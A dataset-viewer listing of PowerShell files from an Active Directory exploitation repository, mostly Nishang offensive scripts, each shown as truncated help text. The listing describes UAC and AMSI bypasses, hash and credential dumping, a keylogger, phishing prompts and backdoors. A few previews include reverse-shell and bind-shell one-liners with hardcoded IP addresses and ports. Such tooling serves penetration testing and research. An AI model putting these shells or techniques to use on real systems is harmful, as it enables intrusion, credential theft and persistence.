source
stringclasses
1 value
repo
stringclasses
33 values
repo_url
stringclasses
33 values
path
stringlengths
7
179
language
stringclasses
1 value
license
stringclasses
4 values
stars
int64
2.27k
53.4k
ref
stringclasses
4 values
size_bytes
int64
48
259k
text
stringlengths
48
259k
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Escalation/Invoke-PsUACme.ps1
PowerShell
mit
2,733
master
50,736
function Invoke-PsUACme { <# .SYNOPSIS Nishang script which uses known methods to bypass UAC. .DESCRIPTION This script implements methods from UACME project (https://github.com/hfiref0x/UACME) to bypass UAC on Windows machines. It drops DLLs in the known misconfigured/vulnerable locations of Windows machines using Wus...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/MITM/Invoke-Interceptor.ps1
PowerShell
mit
2,733
master
26,269
function Invoke-Interceptor { <# .SYNOPSIS Nishang script which is capable of intercepting HTTPS requests by setting up a proxy server and log them to a file. .DESCRIPTION This experimental script, written by Casey Smith (@subTee), demonstrates the ability to capture and tamper with Web sessions. For secure session...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/ActiveDirectory/Add-ConstrainedDelegationBackdoor.ps1
PowerShell
mit
2,733
master
5,055
#Requires -Modules ActiveDirectory # If you do not have AD module, you can refer to the following link. # https://github.com/samratashok/ADModule function Add-ConstrainedDelegationBackdoor { <# .SYNOPSIS Nishang Script which could add constrained delegation backdoor service accounts or add constrained delegation back...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/ActiveDirectory/Set-DCShadowPermissions.ps1
PowerShell
mit
2,733
master
8,839
function Set-DCShadowPermissions { <# .SYNOPSIS Nishang script which can be used to modify AD objects to provide minimal permissions required for DCShadow. .DESCRIPTION The script modifies ACLs to provide minimal permissions to AD objects for DCShadow technique. The script needs DA privileges to do so. Mimikatz can ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Pivot/Create-MultipleSessions.ps1
PowerShell
mit
2,733
master
3,435
function Create-MultipleSessions { <# .SYNOPSIS Nishang script which can check for credentials on remote computers and can open PSSessions if the credentials work. .DESCRIPTION The payload uses WMI to check a credential against given list of computers. Use the -Creds parameter to specify username and password. If the ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Pivot/Invoke-NetworkRelay.ps1
PowerShell
mit
2,733
master
10,301
function Invoke-NetworkRelay { <# .SYNOPSIS Nishang script which can be used to run netsh port forwarding/relaying commands on remote computers. .DESCRIPTION This script is a wrapper around the netsh Windows command's portproxy functionality. It could be used to create and remove network relays between computers...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Bypass/Invoke-AmsiBypass.ps1
PowerShell
mit
2,733
master
63,342
function Invoke-AmsiBypass { <# .SYNOPSIS Nishang script which uses publicly known methods to bypass/avoid AMSI. .DESCRIPTION This script implements publicly known methods bypass or avoid AMSI on Windows machines. AMSI is a script malware detection mechanism enabled by default in Windows 10. (https://msdn.microsoft...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Misc/Speak.ps1
PowerShell
mit
2,733
master
532
function Speak { <# .SYNOPSIS Nishang Payload to which "speaks" the given sentence .DESCRIPTION This payload uses the Speech API and the given senetence is spoken in the MS Narrator's voice. .PARAMETER Sentence The sentence to be spoken .EXAMPLE PS > Speak <senetence> .LINK http://labofapenetrationtester.blogspot....
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Gather/Check-VM.ps1
PowerShell
mit
2,733
master
6,931
function Check-VM { <# .SYNOPSIS Nishang script which detects whether it is in a known virtual machine. .DESCRIPTION This script uses known parameters or 'fingerprints' of Hyper-V, VMWare, Virtual PC, Virtual Box, Xen and QEMU for detecting the environment. .EXAMPLE PS > Check-VM .LINK http://www.labofapenet...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Gather/Get-PassHashes.ps1
PowerShell
mit
2,733
master
17,173
function Get-PassHashes { <# .SYNOPSIS Nishang payload which dumps password hashes. .DESCRIPTION The payload dumps password hashes using the modified powerdump script from MSF. Administrator privileges are required for this script (but not SYSTEM privs as for the original powerdump written by David Kennedy) .EX...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Gather/Get-Information.ps1
PowerShell
mit
2,733
master
3,630
function Get-Information { <# .SYNOPSIS Nishang Payload which gathers juicy information from the target. .DESCRIPTION This payload extracts information form registry and some commands. The information available would be dependent on the privilege with which the script would be executed. .EXAMPLE PS > Get-Informatio...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Gather/Get-WebCredentials.ps1
PowerShell
mit
2,733
master
825
function Get-WebCredentials { <# .SYNOPSIS Nishang script to retrieve web credentials from Windows vault (requires PowerShell v3 and above) .DESCRIPTION This script can be used to retreive web credentiaks stored in Windows Valut from Windows 8 onwards. The script also needs PowerShell v3 onwards and must be run from ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Gather/Invoke-SessionGopher.ps1
PowerShell
mit
2,733
master
41,944
function Invoke-SessionGopher { <# .SYNPOSIS Extracts and decrypts saved session information for software typically used to access Unix systems. .DESCRIPTION Queries HKEY_USERS for PuTTY, WinSCP, and Remote Desktop saved sessions. Decrypts saved passwords for WinSCP. Extracts FileZilla, SuperPuTTY's saved session in...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Gather/Copy-VSS.ps1
PowerShell
mit
2,733
master
2,434
function Copy-VSS { <# .SYNOPSIS Nishang Payload which copies the SAM file (and ntds.dit and SYSTEM hive if run on a Domain Controller). .DESCRIPTION This payload uses the VSS service (starts it if not running), creates a shadow of C: and copies the SAM file which could be used to dump password hashes from it. If the...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Gather/Keylogger.ps1
PowerShell
mit
2,733
master
14,376
<# .SYNOPSIS Nishang Payload which logs keys. .DESCRIPTION This payload logs a user's keys and writes them to file key.log (I know its bad :|) in user's temp directory. The keys are than pasted to pastebin|tinypaste|gmail|all as per selection. Saved keys could then be decoded using the Parse_Key script in nishang. .P...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Gather/FireBuster.ps1
PowerShell
mit
2,733
master
2,109
function FireBuster{ <# .SYNOPSIS This script is part of Nishang. FireBuster is a PowerShell script that does egress testing. It is to be run on the target machine. .DESCRIPTION FireBuster sends packets to FireListener, which hosts a listening server. By default, FireBuster sends packets to all ports (which could be V...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Gather/Show-TargetScreen.ps1
PowerShell
mit
2,733
master
6,112
function Show-TargetScreen { <# .SYNOPSIS Nishang script which can be used for streaming a target's desktop using MJPEG. .DESCRIPTION This script uses MJPEG to stream a target's desktop in real time. It is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Gather/Get-WLAN-Keys.ps1
PowerShell
mit
2,733
master
658
function Get-Wlan-Keys { <# .SYNOPSIS Nishang Payload which dumps keys for WLAN profiles. .DESCRIPTION This payload dumps keys in clear text for saved WLAN profiles. The payload must be run from as administrator to get the keys. .EXAMPLE PS > Get-WLAN-Keys .LINK http://poshcode.org/1700 https://github.com/samratash...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Gather/FireListener.ps1
PowerShell
mit
2,733
master
2,699
function FireListener { <# .SYNOPSIS This script is part of Nishang. FireListener is a PowerShell script that does egress testing. It is to be run on the attacking/listening machine. .DESCRIPTION FireListener hosts a listening server to which FireBuster can send packets to. Firebuster is to be run on the target machin...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Gather/Invoke-SSIDExfil.ps1
PowerShell
mit
2,733
master
5,275
 function Invoke-SSIDExfil { <# .SYNOPSIS Nishang script which can exfiltrate information like user credentials, using WLAN SSID. .DESCRIPTION In the default operation (without any option), the script opens a prompt which asks for user credentials and does not go away till valid local or domain credentials are entere...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Gather/Get-LSASecret.ps1
PowerShell
mit
2,733
master
8,865
function Get-LsaSecret { <# .SYNOPSIS Nishang script which extracts LSA Secrets from local computer. .DESCRIPTION Extracts LSA secrets from HKLM:\\SECURITY\Policy\Secrets\ on a local computer. The payload must be run with elevated permissions, in 32-bit mode and requires permissions to the security key in HKLM. The ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Gather/Invoke-Mimikittenz.ps1
PowerShell
mit
2,733
master
21,511
function Invoke-Mimikittenz { <# .SYNOPSIS Extracts juicy info from memory. .DESCRIPTION Utilizes Windows function ReadProcessMemory() to extract juicy information from target process memory using regex. Author: Jamieson O'Reilly (https://au.linkedin.com/in/jamieson-o-reilly-13ab6470) License: https://creativecommon...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Gather/Invoke-CredentialsPhish.ps1
PowerShell
mit
2,733
master
1,604
function Invoke-CredentialsPhish { <# .SYNOPSIS Nishang script which opens a user credential prompt. .DESCRIPTION This payload opens a prompt which asks for user credentials and does not go away till valid local or domain credentials are entered in the prompt. .EXAMPLE PS > Invoke-CredentialsPhish .LINK http://labof...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Gather/Get-PassHints.ps1
PowerShell
mit
2,733
master
2,493
function Get-PassHints { <# .SYNOPSIS Nishang script which extracts password hint for users in clear text. .DESCRIPTION The script extracts password hints from SAM registry hive. The script needs Administrator privs to read SAM hive. .EXAMPLE PS > Get-PassHints .LINK http://www.labofapenetrationtester.com/201...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Prasadhak/Invoke-Prasadhak.ps1
PowerShell
mit
2,733
master
3,811
function Invoke-Prasadhak { <# .SYNOPSIS Nishang script which checks running processes for malwares. .DESCRIPTION This script uses takes md5 hashes of running processes (the correspondibg executable) on the target system and search the hashes in the Virustotal database using the Public API. .PARAMETER APIKEY THe AP...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Shells/Invoke-PoshRatHttps.ps1
PowerShell
mit
2,733
master
9,669
function Invoke-PoshRatHttps { <# .SYNOPSIS Nishang script which can be used for Reverse interactive PowerShell from a target over HTTPS. .DESCRIPTION This script starts a listener on the attacker's machine. The listener listens on Port 443 by default. On the target machine execute the below command from PowerShell:...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Shells/Invoke-PowerShellIcmp.ps1
PowerShell
mit
2,733
master
4,125
function Invoke-PowerShellIcmp { <# .SYNOPSIS Nishang script which can be used for a Reverse interactive PowerShell from a target over ICMP. .DESCRIPTION This script can receive commands from a server, execute them and return the result to the server using only ICMP. The server to be used with it is icmpsh_m.py fro...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Shells/Invoke-PowerShellTcpOneLine.ps1
PowerShell
mit
2,733
master
983
#A simple and small reverse shell. Options and help removed to save space. #Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well. #$client = New-Object System.Net.Sockets.TCPClient('192.168.254.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Shells/Invoke-JSRatRegsvr.ps1
PowerShell
mit
2,733
master
6,461
function Invoke-JSRatRegsvr { <# .SYNOPSIS Nishang script which can be used for Reverse shell from a target over HTTP using regsvr32.exe. Useful for bypassing Applocker. .DESCRIPTION This script starts a listener on the attacker's machine. The listener needs a port to listen. On the target machine execute the below c...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Shells/Remove-PoshRat.ps1
PowerShell
mit
2,733
master
1,023
function Remove-PoshRat { <# .SYNOPSIS Nishang script which removes firewall rules installed by PoshRat. .DESCRIPTION Use this script to remove firewall rules installed by PoshRat. Firewall rules with the name of "Windows Update HTTPS" are removed by this script. The script must be run from an elevated shell. .PAR...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Shells/Invoke-PowerShellUdp.ps1
PowerShell
mit
2,733
master
5,689
function Invoke-PowerShellUdp { <# .SYNOPSIS Nishang script which can be used for Reverse or Bind interactive PowerShell from a target over UDP. .DESCRIPTION This script is able to connect to a standard netcat listening on a UDP port when using the -Reverse switch. Also, a standard netcat can connect to this script...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Shells/Invoke-PoshRatHttp.ps1
PowerShell
mit
2,733
master
6,767
function Invoke-PoshRatHttp { <# .SYNOPSIS Nishang script which can be used for Reverse interactive PowerShell from a target over HTTP. .DESCRIPTION This script starts a listener on the attacker's machine. The listener needs a port to listen. On the target machine execute the below command from PowerShell: iex (New-...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Shells/Invoke-JSRatRundll.ps1
PowerShell
mit
2,733
master
7,330
function Invoke-JSRatRundll { <# .SYNOPSIS Nishang script which can be used for a Reverse shell from a target over HTTP using rundll32.exe. .DESCRIPTION This script starts a listener on the attacker's machine. The listener needs a port to listen. On the target machine execute the below command: rundll32.exe javascrip...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Shells/Invoke-PsGcat.ps1
PowerShell
mit
2,733
master
11,034
function Invoke-PSGcat { <# .SYNOPSIS Nishang script which can be used to send commands and scripts to Gmail which can then be run on a target using Invoke-PSGcatAgent. .DESCRIPTION This script is capable of sending commands and/or scripts to Gmail. A valid Gmail username and password is required. The command is compr...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Shells/Invoke-PowerShellUdpOneLine.ps1
PowerShell
mit
2,733
master
713
#Uncomment and change the hardcoded IP address and port number in the below line. Remove this help comment as well. #$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("192.168.254.226"),53);$client = New-Object System.Net.Sockets.UDPClient(53);[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Shells/Invoke-PowerShellTcp.ps1
PowerShell
mit
2,733
master
4,339
function Invoke-PowerShellTcp { <# .SYNOPSIS Nishang script which can be used for Reverse or Bind interactive PowerShell from a target. .DESCRIPTION This script is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a s...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Shells/Invoke-ConPtyShell.ps1
PowerShell
mit
2,733
master
24,118
#Requires -Version 2 function Invoke-ConPtyShell { <# .SYNOPSIS ConPtyShell - Fully Interactive Reverse Shell for Windows Author: splinter_code License: MIT Source: https://github.com/antonioCoco/ConPtyShell .DESCRIPTION ConPt...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Shells/Invoke-PsGcatAgent.ps1
PowerShell
mit
2,733
master
6,390
function Invoke-PsGcatAgent { <# .SYNOPSIS Nishang script which can be used to execute commands and scripts from Gmail uploaded by Invoke-PSGcat. .DESCRIPTION This script is capable of executing commands and/or scripts from Gmail and send the output back. A valid Gmail username and password is required. This script m...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Shells/Invoke-PowerShellTcpOneLineBind.ps1
PowerShell
mit
2,733
master
665
#Uncomment and change the hardcoded port number (443) in the below line. Remove this help comment as well. #$listener = [System.Net.Sockets.TcpListener]443;$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Len...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Shells/Invoke-PowerShellWmi.ps1
PowerShell
mit
2,733
master
14,194
function Invoke-PowerShellWmi{ <# .SYNOPSIS Nishang script which can be used for interactive PowerShell over WMI. .DESCRIPTION Executing commands using WMI does not return output. This script utilizes WMI Namespaces to temporarily store the output in Base64 encoded form and returns it to the attacker's machine. T...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Scan/Invoke-BruteForce.ps1
PowerShell
mit
2,733
master
12,964
function Invoke-BruteForce { <# .SYNOPSIS Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Local Accounts, Web and FTP. .DESCRIPTION This payload can brute force credentials for SQL Server, ActiveDirectory, LocalAccounts, Web or FTP. .PARAMETER Computername Specifies a SQL S...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Scan/Invoke-PortScan.ps1
PowerShell
mit
2,733
master
4,386
function Invoke-PortScan { <# .SYNOPSIS Nihsang payload which Scan IP-Addresses, Ports and HostNames .DESCRIPTION Scan for IP-Addresses, HostNames and open Ports in your Network. .PARAMETER StartAddress StartAddress Range .PARAMETER EndAddress EndAddress Range .PARAMETER ResolveHost Resolve HostName .PARAMETER...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Backdoors/Invoke-ADSBackdoor.ps1
PowerShell
mit
2,733
master
4,385
function Invoke-ADSBackdoor{ <# .SYNOPSIS Nishang Script that will use Alternate Data Streams and Windows Registry to achieve persistence. Author: Matt Nelson (@enigma0x3) .DESCRIPTION This script will obtain persistence on a Windows 7+ machine under both Standard and Administrative accounts by using two Alternate Da...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Backdoors/Execute-OnTime.ps1
PowerShell
mit
2,733
master
12,739
function Execute-OnTime { <# .SYNOPSIS Nishang Payload which waits till given time to execute a script. .DESCRIPTION This payload waits till the given time (on the victim) and then downloads a PowerShell script and executes it. If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decod...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Backdoors/Gupt-Backdoor.ps1
PowerShell
mit
2,733
master
6,122
function Gupt-Backdoor { <# .SYNOPSIS Gupt is a backdoor in Nishang which could execute commands and scripts from specially crafted Wireless Network Names. .DESCRIPTION Gupt looks for a specially crafted Wireless Network Name/SSID from list of all avaliable networks. It matches first four characters of each SSID with ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Backdoors/Set-RemotePSRemoting.ps1
PowerShell
mit
2,733
master
5,597
function Set-RemotePSRemoting { <# .SYNOPSIS Nishang script which can be used to modify Security Descriptors of PowerShell Remoting to provide access for non-admin domain users. .DESCRIPTION The script takes a username and adds FUll Control (Generic All) to the ACL of PowerShell Remoting The script needs elevat...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Backdoors/Add-ScrnSaveBackdoor.ps1
PowerShell
mit
2,733
master
5,077
function Add-ScrnSaveBackdoor { <# .SYNOPSIS Nishang Script which could set Debugger registry keys for a screensaver to remotely execute commands and scripts. .DESCRIPTION The script reads the value of Windows registry key HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE to check for the existing Screensaver. If...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Backdoors/Add-ConstrainedDelegationBackdoor.ps1
PowerShell
mit
2,733
master
5,049
#Requires -Modules ActiveDirectory # If you do not have AD module, you can refer to the following link. # https://github.com/samratashok/ADModule function Add-ConstrainedDelegationBackdoor { <# .SYNOPSIS Nishang Script which could add constrained delegation backdoor service accounts or add constrained delegation back...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Backdoors/DNS_TXT_Pwnage.ps1
PowerShell
mit
2,733
master
18,593
function DNS_TXT_Pwnage { <# .SYNOPSIS A backdoor capable of recieving commands and PowerShell scripts from DNS TXT queries. .DESCRIPTION This script continuously queries a domain's TXT records. It could be sent commands and powershell scripts using the TXT records which are executed on the target machine. The PowerSh...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Backdoors/HTTP-Backdoor.ps1
PowerShell
mit
2,733
master
13,572
function HTTP-Backdoor { <# .SYNOPSIS Nishang Payload which queries a URL for instructions and then downloads and executes a powershell script. .DESCRIPTION This payload queries the given URL and after a suitable command (given by MagicString variable) is found, it downloads and executes a powershell script. The payl...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Backdoors/Add-RegBackdoor.ps1
PowerShell
mit
2,733
master
1,741
function Add-RegBackdoor { <# .SYNOPSIS Nishang Script which could set Debugger registry keys for Sticky Keys (sethc.exe) and Utilman (utilman.exe) to remotely execute commands and scripts. .DESCRIPTION This script can be used to set Debugger keys for Sticky Keys (sethc.exe) and Utilman (utilman.exe). The payload ge...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Powermad/Invoke-DNSUpdate.ps1
PowerShell
mit
2,733
master
75,783
function Invoke-DNSUpdate { <# .SYNOPSIS This function performs secure and nonsecure DNS dynamic updates against an AD domain controller. Authentication for secure updates is performed through Kerberos GSS-TSIG. Author: Kevin Robertson (@kevin_robertson) License: BSD 3-Clause .DESCR...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Powermad/Powermad.ps1
PowerShell
mit
2,733
master
135,586
<# Powermad - PowerShell MachineAccountQuota and DNS exploit tools Author: Kevin Robertson (@kevin_robertson) License: BSD 3-Clause https://github.com/Kevin-Robertson/Powermad #> #region begin MachineAccountQuota Functions function Disable-MachineAccount { <# .SYNOPSIS This function disables a machine ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Powermad/Powermad.psm1
PowerShell
mit
2,733
master
201
<# .SYNOPSIS Powermad - PowerShell MachineAccountQuota and DNS exploit tools .LINK https://github.com/Kevin-Robertson/Powermad #> Import-Module $PWD\Powermad.ps1 Import-Module $PWD\Invoke-DNSUpdate.ps1
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/NetCease/NetCease.ps1
PowerShell
mit
2,733
master
4,336
param([switch]$Revert) function IsAdministrator { param() $currentUser = [Security.Principal.WindowsIdentity]::GetCurrent() (New-Object Security.Principal.WindowsPrincipal($currentUser)).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator) } function BackupRegistryValue { param([string...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/DAMP-master/RemoteHashRetrieval.ps1
PowerShell
mit
2,733
master
69,292
#region PSReflect function New-InMemoryModule { <# .SYNOPSIS Creates an in-memory assembly and module Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION When defining custom enums, structs, and unmanaged functions, it is necessary to...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/DAMP-master/Add-RemoteRegBackdoor.ps1
PowerShell
mit
2,733
master
14,041
function Add-RemoteRegBackdoor { <# .SYNOPSIS Implements a new remote registry backdoor that allows for the remote retrieval of a system's machine account hash. Author: Matt Nelson (@enigma0x3), Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None .DESCRIPTION Ad...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Find-PS-WMI/Find-PSRemotingLocalAdminAccess.ps1
PowerShell
mit
2,733
master
2,805
function Find-PSRemotingLocalAdminAccess { <# .SYNOPSIS Use this script to search for local admin access on machines in a domain or local network. .DESCRIPTION This function simply runs a PowerShell Remoting command against the sepcified list of computers. Since, by-default, we need local administrative access on a...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Find-PS-WMI/Find-WMILocalAdminAccess.ps1
PowerShell
mit
2,733
master
2,768
function Find-WMILocalAdminAccess { <# .SYNOPSIS Use this script tp search for local admin access on machines in a domain or local network. .DESCRIPTION This function simply runs a WMI command against the sepcified list of computers. Since, by-default, we need local administrative access on a computer to run WMI co...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Invoke-ACLPwn/Invoke-ACLPwn.ps1
PowerShell
mit
2,733
master
64,384
### Written by Rindert Kramer #################### # # Copyright (c) 2018 Fox-IT # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the right...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/SessionGopher/SessionGopher.ps1
PowerShell
mit
2,733
master
39,492
